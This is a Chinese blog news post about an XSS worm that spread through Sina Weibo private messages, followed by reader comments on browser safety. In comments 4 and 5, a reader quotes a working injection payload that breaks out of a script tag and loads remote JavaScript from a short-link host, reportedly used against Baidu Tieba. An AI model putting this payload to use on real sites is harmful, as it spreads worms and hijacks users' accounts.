月光微博客 » 微新闻 » 新浪微博遭蠕虫病毒攻击

新浪微博遭蠕虫病毒攻击

  6月28日晚间,新浪微博遭到蠕虫病毒攻击,新浪微博用户收到大量包含恶意链接的私信,如果用户点击链接,则会自动添加某一账号为粉丝,并发出多条微博和私信。

  新浪称截至21点25,微博上的恶意链接数据已经清除完毕,攻击者的帐号已被关闭,按照其粉丝数量看,可能有3万多人中招。

  据知乎用户分析,这次攻击的原因是新浪微博广场页面有XSS漏洞,被植入了恶意JS脚本。初步发现 Chrome 和 Safari 都没中招。IE、Firefox未能幸免。

  话说,Chrome的确是个很好的浏览器,启动快,速度快,安全性好,界面清爽,配合Proxy Switchy也能很好解决远程Socks5域名解析问题,是个值得推荐,久经考验的好浏览器。

  攻击者此次在新浪微博发布蠕虫病毒是件很冒险的事情,一般大公司有专门的法律部门,很善于打官司,在法律上处于强势地位,也有相应的部门进行技术分析,被攻击后都会报案,一旦攻击者留下蛛丝马迹,那么有可能就要面临牢狱之灾,可谓得不偿失。

相关文章

  1. 1
    绿草 说道:
    还好我用的是 Chrome
  1. 2
    野草博客 说道:
    希望能看到新浪采取法律措施的后续报道~
  1. 3
    ncsglz 说道:
    这个是页面的漏洞吧,跟浏览器的安全性有关系吗?烦请解释一下
  1. 4
    小燚 说道:
    您好,就在28号前的26号,百度贴吧也收到类似攻击,因为最近贴吧添加了一个类似微博的“@”功能,复制一个标题和内容
    标题:显然,或者,哦,这事做错了?</script><script/src=//t.cn/aCXCxM>
    内容:我想说啥来着??@samy_joke
    统一指向@后面的那个人
  1. 5
    小燚 说道:
    我前面的留言为什么被删了呢??那我贴哥外链吧,就是百度贴吧早于新浪微博,出现这个情况,26号发生的。上面网站链接没法贴,这里贴不了
    那种帖的标题:显然,或者,哦,这事做错了?</script><script/src=//t.cn/aCXCxM>

    内容是:我想说啥来着??@samy_joke

    点击了,你就会疯狂地发送这些垃圾信息到其他吧里
  1. 6
    keshin 说道:
    看起来强悍的似乎是webkit这个内核吧
  1. 7
    千与琥珀 说道:
    Chrome的沙盘技术是够强悍的
    此外你的文章与chromi . org / archives / 12699的几乎一样
  1. 8
    williamlong 说道:
    文章一样的原因是因为Chromi转载这里文章。
  1. 9
    千与琥珀 说道:
    恩,他好像忘了标记出处……
  1. 10
    沙漠之子 说道:
    在此之前网上有篇<利用窗口引用漏洞和XSS漏洞实现浏览器劫持>的技术文,上面只说opera和ie8没该漏洞的说
  1. 11
    listen 说道:
    幸亏用的是Chrome
    而且,我还在奇怪为什么没中招呢,哈哈
  1. 12
    uubird 说道:
    firefox一样是webkit。。
  1. 13
    华盛顿 说道:
    chrome迷转载本文是标明了出处的,就在文章最前面,显目的地方
  1. 14
    z 说道:
    firefox 是 Gecko 核心

发表留言